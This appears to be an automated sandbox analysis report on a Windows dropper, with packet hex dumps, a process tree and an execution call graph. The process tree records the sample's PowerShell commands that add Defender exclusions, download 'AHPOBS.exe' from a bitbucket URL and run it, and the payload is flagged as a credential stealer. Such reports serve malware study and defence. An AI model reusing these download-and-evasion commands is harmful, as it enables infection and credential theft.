                                    2024-12-24 08:02:27 UTC1749INData Raw: 4a 00 83 f8 01 0f 84 07 0c 02 00 68 54 7f 4a 00 8d 4d ff b8 6c 7f 4a 00 e8 2b 1f 00 00 84 c0 0f 84 14 0c 02 00 8a 0d e8 90 4a 00 8a 1d e9 90 4a 00 68 50 7f 4a 00 8d 95 c8 fb ff ff 52 68 04 01 00 00 68 6c 7f 4a 00 88 0d 58 7f 4a 00 ff 15 24 23 48 00 a1 54 7f 4a 00 50 68 6c 7f 4a 00 e8 25 3e ff ff 85 c0 0f 85 e4 0b 02 00 80 fb 01 0f 84 01 0c 02 00 e8 3f 2d 00 00 e8 1a 2f 00 00 80 3d 58 7f 4a 00 00 75 0a be 10 87 4a 00 e8 57 0a 00 00 6a 01 b9 78 81 4a 00 e8 6b bb ff ff 80 3d 58 7f 4a 00 00 75 0a b9 10 87 4a 00 e8 78 39 ff ff bb e8 90 4a 00 e8 be 15 00 00 8d 95 d8 fd ff ff 52 ff 15 28 23 48 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 a1 04 96 4a 00 83 ec 2c 53 33 db 56 57 38 58 1d 0f 84 27 0c 02 00 8b 4d 08 bf 01 00 00 00 8d 74 24
                                    Data Ascii: JhTJMlJ+JJhPJRhhlJXJ$#HTJPhlJ%>?-/=XJuJWjxJk=XJuJx9JR(#H_^[]UJ,S3VW8X'Mt$
                                    2024-12-24 08:02:27 UTC16384INData Raw: 30 86 4a 00 01 a3 34 86 4a 00 89 1d 38 86 4a 00 88 1d 3c 86 4a 00 89 1d 40 86 4a 00 a3 48 86 4a 00 89 3d 4c 86 4a 00 89 1d 50 86 4a 00 89 1d 54 86 4a 00 89 35 58 86 4a 00 89 1d 5c 86 4a 00 89 1d 60 86 4a 00 89 1d 64 86 4a 00 88 1d 68 86 4a 00 e8 6d df ff ff c7 05 8c 86 4a 00 10 ab 48 00 89 1d 90 86 4a 00 89 1d 94 86 4a 00 89 1d 98 86 4a 00 89 35 9c 86 4a 00 c7 05 a0 86 4a 00 2c cc 48 00 89 1d a4 86 4a 00 89 1d a8 86 4a 00 89 1d ac 86 4a 00 c7 05 b0 86 4a 00 03 00 00 00 89 3d b4 86 4a 00 89 1d b8 86 4a 00 89 1d bc 86 4a 00 89 1d c0 86 4a 00 89 35 c4 86 4a 00 89 35 c8 86 4a 00 89 1d fc 86 4a 00 89 1d 00 87 4a 00 89 1d 04 87 4a 00 89 35 08 87 4a 00 c7 05 44 86 4a 00 7c 00 00 00 e8 7a 14 00 00 84 c0 0f 85 f9 8c 01 00 89 5d fc bb 03 00 00 00 8d 55 fc 52 be a0
                                    Data Ascii: 0J4J8J<J@JHJ=LJPJTJ5XJ\J`JdJhJmJHJJJ5JJ,HJJJJ=JJJJ5J5JJJJ5JDJ|z]UR
                                    2024-12-24 08:02:27 UTC1024INData Raw: f3 74 0f 33 db 85 f6 0f 9f c3 8d 74 1b ff eb 02 33 f6 85 f6 0f 85 aa 01 00 00 8b 70 14 3b 71 14 74 76 0f b6 70 14 0f b6 59 14 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff 85 f6 0f 85 83 01 00 00 0f b6 70 15 0f b6 59 15 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff 85 f6 0f 85 64 01 00 00 0f b6 70 16 0f b6 59 16 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff 85 f6 0f 85 45 01 00 00 0f b6 70 17 0f b6 59 17 2b f3 74 0f 33 db 85 f6 0f 9f c3 8d 74 1b ff eb 02 33 f6 85 f6 0f 85 22 01 00 00 8b 70 18 3b 71 18 74 76 0f b6 70 18 0f b6 59 18 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff 85 f6 0f 85 fb 00 00 00 0f b6 70 19 0f b6 59 19 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff 85 f6 0f 85 dc 00 00 00 0f b6 70 1a 0f b6 59 1a 2b f3 74 13 33 db 85 f6 0f 9f c3 8d 74 1b ff
                                    Data Ascii: t3t3p;qtvpY+t3tpY+t3tdpY+t3tEpY+t3t3"p;qtvpY+t3tpY+t3tpY+t3t
                                    2024-12-24 08:02:27 UTC16384INData Raw: 70 f5 0f b6 51 f5 2b f2 74 13 33 d2 85 f6 0f 9f c2 8d 74 12 ff 85 f6 0f 85 a7 fd ff ff 0f b6 70 f6 0f b6 51 f6 2b f2 74 13 33 d2 85 f6 0f 9f c2 8d 74 12 ff 85 f6 0f 85 88 fd ff ff 0f b6 70 f7 0f b6 51 f7 2b f2 74 0f 33 d2 85 f6 0f 9f c2 8d 74 12 ff eb 02 33 f6 85 f6 0f 85 65 fd ff ff 8b 50 f8 3b 51 f8 74 75 0f b6 f2 0f b6 51 f8 2b f2 74 13 33 d2 85 f6 0f 9f c2 8d 74 12 ff 85 f6 0f 85 3f fd ff ff 0f b6 70 f9 0f b6 51 f9 2b f2 74 13 33 d2 85 f6 0f 9f c2 8d 74 12 ff 85 f6 0f 85 20 fd ff ff 0f b6 70 fa 0f b6 51 fa 2b f2 74 13 33 d2 85 f6 0f 9f c2 8d 74 12 ff 85 f6 0f 85 01 fd ff ff 0f b6 70 fb 0f b6 51 fb 2b f2 74 0f 33 d2 85 f6 0f 9f c2 8d 74 12 ff eb 02 33 f6 85 f6 0f 85 de fc ff ff 8b 50 fc 3b 51 fc 74 6d 0f b6 f2 0f b6 51 fc 2b f2 74 0f 33 d2 85 f6 0f 9f
                                    Data Ascii: pQ+t3tpQ+t3tpQ+t3t3eP;QtuQ+t3t?pQ+t3t pQ+t3tpQ+t3t3P;QtmQ+t3


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:03:02:08
                                    Start date:24/12/2024
                                    Path:C:\Users\user\Desktop\Gq48hjKhZf.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\Gq48hjKhZf.exe"
                                    Imagebase:0x140000000
                                    File size:123'392 bytes
                                    MD5 hash:454BF064C19D363B154A419FC69DC693
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:1
                                    Start time:03:02:09
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
                                    Imagebase:0x7ff68b5f0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:2
                                    Start time:03:02:09
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:3
                                    Start time:03:02:09
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:03:02:20
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:03:02:31
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:03:02:41
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
                                    Imagebase:0x7ff68b5f0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:10
                                    Start time:03:02:41
                                    Start date:24/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;
                                    Imagebase:0x400000
                                    File size:1'136'091 bytes
                                    MD5 hash:A9C526F3A276012D554AC382A90BCA3D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 74%, ReversingLabs
                                    • Detection: 71%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:7.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.2%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:34
                                      execution_graph 8272 14000e3f0 8273 14000e4ee 8272->8273 8274 14000e40a 8272->8274 8274->8273 8275 14000e483 8274->8275 8276 14000e41a 8274->8276 8289 14000e770 WideCharToMultiByte 8275->8289 8277 14000e451 8276->8277 8278 14000e425 8276->8278 8277->8277 8280 14000e45d WriteFile 8277->8280 8282 14000e620 5 API calls 8278->8282 8286 14000e445 8282->8286 8283 14000e4c5 WriteFile 8285 14000e4dc HeapFree 8283->8285 8284 14000e4b7 8294 14000e620 8284->8294 8285->8273 8288 14000e4bf 8288->8285 8290 14000e7b9 HeapAlloc 8289->8290 8291 14000e4a0 8289->8291 8292 14000e804 8290->8292 8293 14000e7d8 WideCharToMultiByte 8290->8293 8291->8273 8291->8283 8291->8284 8292->8291 8293->8292 8295 14000e644 8294->8295 8296 14000e75e 8294->8296 8297 14000e673 8295->8297 8298 14000e64a SetFilePointer 8295->8298 8296->8288 8299 14000e6ff 8297->8299 8302 14000e67e 8297->8302 8298->8297 8300 14000ddc0 WriteFile 8299->8300 8301 14000e707 8300->8301 8304 14000e711 WriteFile 8301->8304 8305 14000e739 memmove 8301->8305 8303 14000e6b7 8302->8303 8306 14000e699 memmove 8302->8306 8303->8288 8304->8288 8305->8288 8306->8288 8307 140001000 8308 14000101d 8307->8308 8357 140012060 HeapCreate TlsAlloc 8308->8357 8310 14000105b 8360 14000de20 8310->8360 8312 140001065 8363 14000c980 HeapCreate 8312->8363 8314 140001074 8364 14000b538 memset InitCommonControlsEx CoInitialize 8314->8364 8316 14000107e 8365 1400120d0 8316->8365 8318 1400010a3 8372 14000ccd8 8318->8372 8325 14000d524 16 API calls 8326 14000112a 8325->8326 8327 14000d444 11 API calls 8326->8327 8328 14000114e 8327->8328 8329 140011d30 4 API calls 8328->8329 8330 140001185 8329->8330 8331 1400120d0 3 API calls 8330->8331 8332 1400011a6 8331->8332 8333 14000d524 16 API calls 8332->8333 8334 1400011b2 8333->8334 8335 14000d444 11 API calls 8334->8335 8336 1400011d6 8335->8336 8397 14000c4d0 8336->8397 8340 1400011ef 8404 1400121c0 GetLastError TlsGetValue SetLastError 8340->8404 8342 1400011ff 8405 140004211 8342->8405 8346 14000121f 8428 1400021ea 8346->8428 8349 140001236 8535 14000593c 8349->8535 8896 140012c50 HeapAlloc HeapAlloc TlsSetValue 8357->8896 8359 14001208c 8359->8310 8897 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 8360->8897 8362 14000de38 8362->8312 8363->8314 8364->8316 8366 140012178 8365->8366 8368 1400120f3 8365->8368 8367 140012183 HeapFree 8366->8367 8371 14001215f 8366->8371 8367->8371 8369 140012133 HeapReAlloc 8368->8369 8370 14001210d HeapAlloc 8368->8370 8369->8371 8370->8371 8371->8318 8898 14000ce30 8372->8898 8375 14000cd23 HeapAlloc 8377 14000cdcc HeapFree 8375->8377 8378 14000cd51 8375->8378 8376 1400010e6 8381 14000d524 8376->8381 8377->8376 8907 1400117fc 8378->8907 8382 1400010fa 8381->8382 8383 14000d52d 8381->8383 8392 14000d444 HeapAlloc 8382->8392 8966 14000d60c 8383->8966 8386 140011968 9 API calls 8387 14000d548 8386->8387 8388 14000d562 HeapFree 8387->8388 8389 14000d57c 8387->8389 8388->8388 8388->8389 8390 14000d582 HeapFree 8389->8390 8391 14000d595 HeapFree 8389->8391 8390->8391 8391->8382 8393 14000d484 HeapAlloc 8392->8393 8394 14000d4a0 8392->8394 8393->8394 8395 1400117fc 9 API calls 8394->8395 8396 14000111e 8395->8396 8396->8325 8398 14000c890 8397->8398 8399 14000c8a5 RemoveVectoredExceptionHandler 8398->8399 8400 14000c8b6 8398->8400 8399->8400 8401 14000c8bb AddVectoredExceptionHandler 8400->8401 8402 1400011e5 8400->8402 8401->8402 8403 1400121c0 GetLastError TlsGetValue SetLastError 8402->8403 8403->8340 8404->8342 8973 1400123e0 8405->8973 8407 140004222 8985 1400121c0 GetLastError TlsGetValue SetLastError 8407->8985 8409 1400042a4 8986 1400121c0 GetLastError TlsGetValue SetLastError 8409->8986 8411 1400042b8 8987 1400121c0 GetLastError TlsGetValue SetLastError 8411->8987 8413 1400042c8 8988 1400121c0 GetLastError TlsGetValue SetLastError 8413->8988 8415 1400042d8 8989 140010d90 8415->8989 8419 14000430a 8993 140007dc0 8419->8993 8423 14000120e 8424 140012210 TlsGetValue 8423->8424 8425 140012251 HeapAlloc 8424->8425 8426 140012276 HeapReAlloc 8424->8426 8427 1400122a1 8425->8427 8426->8427 8427->8346 8429 1400123e0 21 API calls 8428->8429 8430 1400021ff 8429->8430 9031 1400121c0 GetLastError TlsGetValue SetLastError 8430->9031 8432 140002209 9032 1400121c0 GetLastError TlsGetValue SetLastError 8432->9032 8434 140002227 9033 1400121c0 GetLastError TlsGetValue SetLastError 8434->9033 8436 14000223b 9034 14000c0c4 8436->9034 8440 140012360 HeapFree 8441 140002666 8440->8441 8443 140012360 HeapFree 8441->8443 8442 14000239c 8444 14000d60c 4 API calls 8442->8444 8445 140002678 8443->8445 8446 1400023a8 8444->8446 8447 140012360 HeapFree 8445->8447 9041 1400121c0 GetLastError TlsGetValue SetLastError 8446->9041 8449 14000268a 8447->8449 8451 140012360 HeapFree 8449->8451 8450 1400023b2 9042 1400121c0 GetLastError TlsGetValue SetLastError 8450->9042 8453 14000269c 8451->8453 8454 140012360 HeapFree 8453->8454 8456 140001224 8454->8456 8455 1400023c6 9043 1400121c0 GetLastError TlsGetValue SetLastError 8455->9043 8456->8349 8765 14000433f 8456->8765 8458 1400023d6 9044 1400121c0 GetLastError TlsGetValue SetLastError 8458->9044 8460 140002255 8460->8442 8461 1400121c0 GetLastError TlsGetValue SetLastError 8460->8461 8466 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8460->8466 8468 140012210 TlsGetValue HeapAlloc HeapReAlloc 8460->8468 8515 140002646 8460->8515 8461->8460 8462 1400023e6 9045 1400121c0 GetLastError TlsGetValue SetLastError 8462->9045 8464 1400023fb 9046 1400121c0 GetLastError TlsGetValue SetLastError 8464->9046 8466->8460 8467 14000240f 9047 140007ce0 8467->9047 8468->8460 8472 140002431 9056 140010ba0 8472->9056 8476 140002450 8477 140007dc0 6 API calls 8476->8477 8478 140002463 8477->8478 8479 140012210 3 API calls 8478->8479 8480 140002472 8479->8480 9063 1400121c0 GetLastError TlsGetValue SetLastError 8480->9063 8482 140002481 9064 140012450 8482->9064 8484 140002490 8485 140012210 3 API calls 8484->8485 8486 14000249f 8485->8486 9069 1400121c0 GetLastError TlsGetValue SetLastError 8486->9069 8488 1400024a9 9070 1400121c0 GetLastError TlsGetValue SetLastError 8488->9070 8490 1400024bd 9071 1400121c0 GetLastError TlsGetValue SetLastError 8490->9071 8492 1400024cd 9072 1400121c0 GetLastError TlsGetValue SetLastError 8492->9072 8494 1400024dd 8495 140010ba0 6 API calls 8494->8495 8496 1400024f9 8495->8496 9073 1400125d0 TlsGetValue 8496->9073 8498 140002503 8499 140007dc0 6 API calls 8498->8499 8500 140002516 8499->8500 8501 140012210 3 API calls 8500->8501 8502 140002525 8501->8502 9074 1400121c0 GetLastError TlsGetValue SetLastError 8502->9074 8504 14000252f 9075 1400121c0 GetLastError TlsGetValue SetLastError 8504->9075 8506 140002543 9076 140007e50 8506->9076 8508 14000255f 8509 140012210 3 API calls 8508->8509 8510 14000256e 8509->8510 9084 1400124c0 8510->9084 8515->8440 8536 140005945 8535->8536 8536->8536 8537 1400123e0 21 API calls 8536->8537 8555 14000595f 8537->8555 8538 1400121c0 GetLastError TlsGetValue SetLastError 8551 140005a39 8538->8551 8539 140007c90 3 API calls 8539->8555 8540 140012210 TlsGetValue HeapAlloc HeapReAlloc 8540->8555 8541 140007c90 3 API calls 8541->8551 8542 1400121c0 GetLastError TlsGetValue SetLastError 8563 140005b13 8542->8563 8543 1400121c0 GetLastError TlsGetValue SetLastError 8571 140005bed 8543->8571 8544 140007c90 3 API calls 8544->8563 8545 1400121c0 GetLastError TlsGetValue SetLastError 8545->8555 8546 140012210 TlsGetValue HeapAlloc HeapReAlloc 8546->8551 8547 140007c90 3 API calls 8547->8571 8548 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8548->8555 8549 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8549->8551 8551->8538 8551->8541 8551->8546 8551->8549 8551->8563 8552 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8552->8563 8553 140007c90 3 API calls 8583 140005da1 8553->8583 8554 1400121c0 GetLastError TlsGetValue SetLastError 8587 140005e7f 8554->8587 8555->8539 8555->8540 8555->8545 8555->8548 8555->8551 8556 140006119 9108 1400121c0 GetLastError TlsGetValue SetLastError 8556->9108 8557 1400121c0 GetLastError TlsGetValue SetLastError 8578 140005cc7 8557->8578 8558 140012210 TlsGetValue HeapAlloc HeapReAlloc 8558->8583 8559 140007c90 3 API calls 8559->8587 8560 1400121c0 GetLastError TlsGetValue SetLastError 8596 14000603b 8560->8596 8562 14000612a 8564 140012450 4 API calls 8562->8564 8563->8542 8563->8544 8563->8552 8565 140012210 TlsGetValue HeapAlloc HeapReAlloc 8563->8565 8563->8571 8570 140006139 8564->8570 8565->8563 8566 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8566->8571 8567 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8567->8578 8568 1400121c0 GetLastError TlsGetValue SetLastError 8568->8583 8569 140007c90 3 API calls 8593 140005f5d 8569->8593 8574 140012450 4 API calls 8570->8574 8571->8543 8571->8547 8571->8566 8575 140012210 TlsGetValue HeapAlloc HeapReAlloc 8571->8575 8571->8578 8572 140012210 TlsGetValue HeapAlloc HeapReAlloc 8572->8593 8573 140007c90 3 API calls 8573->8596 8577 14000614b 8574->8577 8575->8571 8576 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8576->8583 8582 140012210 3 API calls 8577->8582 8578->8557 8578->8567 8579 140012210 TlsGetValue HeapAlloc HeapReAlloc 8578->8579 8578->8583 9105 140007c90 8578->9105 8579->8578 8580 1400121c0 GetLastError TlsGetValue SetLastError 8580->8593 8581 140012210 TlsGetValue HeapAlloc HeapReAlloc 8581->8596 8584 14000615c 8582->8584 8583->8553 8583->8558 8583->8568 8583->8576 8583->8587 9109 1400121c0 GetLastError TlsGetValue SetLastError 8584->9109 8585 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8585->8587 8587->8554 8587->8559 8587->8585 8589 140012210 TlsGetValue HeapAlloc HeapReAlloc 8587->8589 8587->8593 8588 140006166 9110 1400121c0 GetLastError TlsGetValue SetLastError 8588->9110 8589->8587 8590 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8590->8593 8591 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8591->8596 8593->8569 8593->8572 8593->8580 8593->8590 8593->8596 8594 140006176 9111 1400047e2 8594->9111 8596->8556 8596->8560 8596->8573 8596->8581 8596->8591 8598 140012210 3 API calls 8599 14000619e 8598->8599 8600 14000c2bc 16 API calls 8599->8600 8601 1400061a3 GetModuleHandleW 8600->8601 9138 1400121c0 GetLastError TlsGetValue SetLastError 8601->9138 8603 1400061c4 9139 1400121c0 GetLastError TlsGetValue SetLastError 8603->9139 8605 1400061d8 9140 1400121c0 GetLastError TlsGetValue SetLastError 8605->9140 8607 1400061e8 9141 1400121c0 GetLastError TlsGetValue SetLastError 8607->9141 8609 1400061f8 8610 140010ba0 6 API calls 8609->8610 8611 140006216 8610->8611 9142 1400125d0 TlsGetValue 8611->9142 8613 140006220 8614 140007dc0 6 API calls 8613->8614 8615 140006233 8614->8615 8616 140012210 3 API calls 8615->8616 8617 140006245 8616->8617 9143 1400121c0 GetLastError TlsGetValue SetLastError 8617->9143 8619 14000624f 9144 1400121c0 GetLastError TlsGetValue SetLastError 8619->9144 8621 140006263 9145 1400121c0 GetLastError TlsGetValue SetLastError 8621->9145 8623 140006273 9146 1400121c0 GetLastError TlsGetValue SetLastError 8623->9146 8625 140006283 8626 140010ba0 6 API calls 8625->8626 8627 1400062a2 8626->8627 9147 1400125d0 TlsGetValue 8627->9147 8629 1400062ac 8630 140007dc0 6 API calls 8629->8630 8631 1400062bf 8630->8631 8632 140012210 3 API calls 8631->8632 8633 1400062d1 8632->8633 9148 140004134 8633->9148 8637 1400062ed 9158 1400121c0 GetLastError TlsGetValue SetLastError 8637->9158 8639 1400062fd 9159 140002c46 8639->9159 8641 140006314 9273 140001e57 8641->9273 8647 140006344 9363 1400121c0 GetLastError TlsGetValue SetLastError 8647->9363 8649 140006354 9364 1400049ea 8649->9364 8652 140012210 3 API calls 8653 1400063a0 PathRemoveBackslashW 8652->8653 8654 1400063b9 8653->8654 9492 1400121c0 GetLastError TlsGetValue SetLastError 8654->9492 8656 1400063c3 9493 1400121c0 GetLastError TlsGetValue SetLastError 8656->9493 8658 1400063d7 9494 1400121c0 GetLastError TlsGetValue SetLastError 8658->9494 8660 1400063e7 9495 140003cc9 8660->9495 8664 140006406 9519 1400125d0 TlsGetValue 8664->9519 8666 140006410 9520 14000c45c 8666->9520 8668 140006424 9523 1400121c0 GetLastError TlsGetValue SetLastError 8668->9523 8670 140006449 8671 140012450 4 API calls 8670->8671 8672 140006458 8671->8672 8673 140012450 4 API calls 8672->8673 8674 14000646c 8673->8674 8675 140012210 3 API calls 8674->8675 8676 14000647d 8675->8676 9524 1400121c0 GetLastError TlsGetValue SetLastError 8676->9524 8678 140006487 9525 1400121c0 GetLastError TlsGetValue SetLastError 8678->9525 8680 140006497 9526 1400026bb 8680->9526 8683 140012210 3 API calls 8684 1400064c0 8683->8684 9572 140004ee2 8684->9572 8688 1400064d6 8689 140012450 4 API calls 8688->8689 8690 1400064e5 8689->8690 8691 140012210 3 API calls 8690->8691 8692 1400064f7 PathQuoteSpacesW 8691->8692 9776 1400121c0 GetLastError TlsGetValue SetLastError 8692->9776 8694 140006516 8695 140012450 4 API calls 8694->8695 8696 140006525 8695->8696 8697 140012450 4 API calls 8696->8697 8698 14000653c 8697->8698 8699 140012450 4 API calls 8698->8699 8700 140006551 8699->8700 8701 140012210 3 API calls 8700->8701 8702 140006563 PathQuoteSpacesW 8701->8702 8703 1400065a1 8702->8703 8704 14000657d 8702->8704 9822 140003ddc 8703->9822 9812 140007284 CreateThread 8704->9812 8707 1400065ab 9777 1400121c0 GetLastError TlsGetValue SetLastError 8707->9777 8710 1400065b5 9778 1400121c0 GetLastError TlsGetValue SetLastError 8710->9778 8712 1400065ce 8713 140012450 4 API calls 8712->8713 8714 1400065dd 8713->8714 8715 140012450 4 API calls 8714->8715 8716 1400065f4 8715->8716 8717 140012450 4 API calls 8716->8717 8718 140006609 8717->8718 9779 140012520 TlsGetValue 8718->9779 8720 140006612 9780 1400121c0 GetLastError TlsGetValue SetLastError 8720->9780 8722 14000661c 9781 1400121c0 GetLastError TlsGetValue SetLastError 8722->9781 8724 14000662c 9782 14000daa8 8724->9782 8728 140006645 9789 1400121c0 GetLastError TlsGetValue SetLastError 8728->9789 8730 140006657 8731 140012450 4 API calls 8730->8731 8732 140006666 8731->8732 8733 140012450 4 API calls 8732->8733 8734 140006678 8733->8734 9790 1400125d0 TlsGetValue 8734->9790 8736 140006682 9791 1400125d0 TlsGetValue 8736->9791 8738 140006690 9792 1400125d0 TlsGetValue 8738->9792 8740 14000669f 9793 1400029c8 8740->9793 8766 1400123e0 21 API calls 8765->8766 8767 140004351 8766->8767 10688 1400121c0 GetLastError TlsGetValue SetLastError 8767->10688 8769 14000435b 10689 1400121c0 GetLastError TlsGetValue SetLastError 8769->10689 8771 14000436f 10690 1400121c0 GetLastError TlsGetValue SetLastError 8771->10690 8773 14000437f 10691 1400121c0 GetLastError TlsGetValue SetLastError 8773->10691 8775 14000438f 8776 140010ba0 6 API calls 8775->8776 8777 1400043ad 8776->8777 10692 1400125d0 TlsGetValue 8777->10692 8779 1400043b7 8780 140007dc0 6 API calls 8779->8780 8781 1400043ca 8780->8781 8782 140012210 3 API calls 8781->8782 8783 1400043d9 8782->8783 10693 1400121c0 GetLastError TlsGetValue SetLastError 8783->10693 8785 1400043e3 10694 1400121c0 GetLastError TlsGetValue SetLastError 8785->10694 8787 1400043f7 10695 1400121c0 GetLastError TlsGetValue SetLastError 8787->10695 8789 140004407 10696 1400121c0 GetLastError TlsGetValue SetLastError 8789->10696 8791 140004417 8792 140010ba0 6 API calls 8791->8792 8793 140004433 8792->8793 10697 1400125d0 TlsGetValue 8793->10697 8795 14000443d 8796 140007dc0 6 API calls 8795->8796 8797 140004450 8796->8797 8798 140012210 3 API calls 8797->8798 8799 14000445f 8798->8799 8800 140004134 24 API calls 8799->8800 8801 140004469 8800->8801 10698 1400121c0 GetLastError TlsGetValue SetLastError 8801->10698 8803 140004478 10699 1400121c0 GetLastError TlsGetValue SetLastError 8803->10699 8805 140004488 8806 140002c46 110 API calls 8805->8806 8807 14000449c 8806->8807 10700 1400121c0 GetLastError TlsGetValue SetLastError 8807->10700 8809 1400044ba 10701 1400121c0 GetLastError TlsGetValue SetLastError 8809->10701 8811 1400044ce 8812 14000bc94 24 API calls 8811->8812 8813 1400044f2 8812->8813 8814 140012210 3 API calls 8813->8814 8815 140004501 8814->8815 8816 1400124c0 wcscmp 8815->8816 8817 14000450e 8816->8817 8818 140004779 8817->8818 10702 1400121c0 GetLastError TlsGetValue SetLastError 8817->10702 8818->8818 8820 140004521 10703 1400121c0 GetLastError TlsGetValue SetLastError 8820->10703 8822 140004535 10704 1400121c0 GetLastError TlsGetValue SetLastError 8822->10704 8824 140004545 10705 1400121c0 GetLastError TlsGetValue SetLastError 8824->10705 8826 140004555 8827 140010ba0 6 API calls 8826->8827 8828 140004573 8827->8828 10706 1400125d0 TlsGetValue 8828->10706 8830 14000457d 8831 140007dc0 6 API calls 8830->8831 8832 140004590 8831->8832 8833 140012210 3 API calls 8832->8833 8834 14000459f 8833->8834 10707 1400121c0 GetLastError TlsGetValue SetLastError 8834->10707 8836 1400045a9 10708 1400121c0 GetLastError TlsGetValue SetLastError 8836->10708 8838 1400045bd 10709 1400121c0 GetLastError TlsGetValue SetLastError 8838->10709 8840 1400045cd 10710 1400121c0 GetLastError TlsGetValue SetLastError 8840->10710 8842 1400045dd 8843 140010ba0 6 API calls 8842->8843 8844 1400045fb 8843->8844 10711 1400125d0 TlsGetValue 8844->10711 8846 140004605 8847 140007dc0 6 API calls 8846->8847 8848 140004618 8847->8848 8849 140012210 3 API calls 8848->8849 8850 140004627 8849->8850 10712 1400121c0 GetLastError TlsGetValue SetLastError 8850->10712 8852 140004631 10713 1400121c0 GetLastError TlsGetValue SetLastError 8852->10713 8854 140004641 8855 140005794 69 API calls 8854->8855 8856 14000465b 8855->8856 8857 140012210 3 API calls 8856->8857 8858 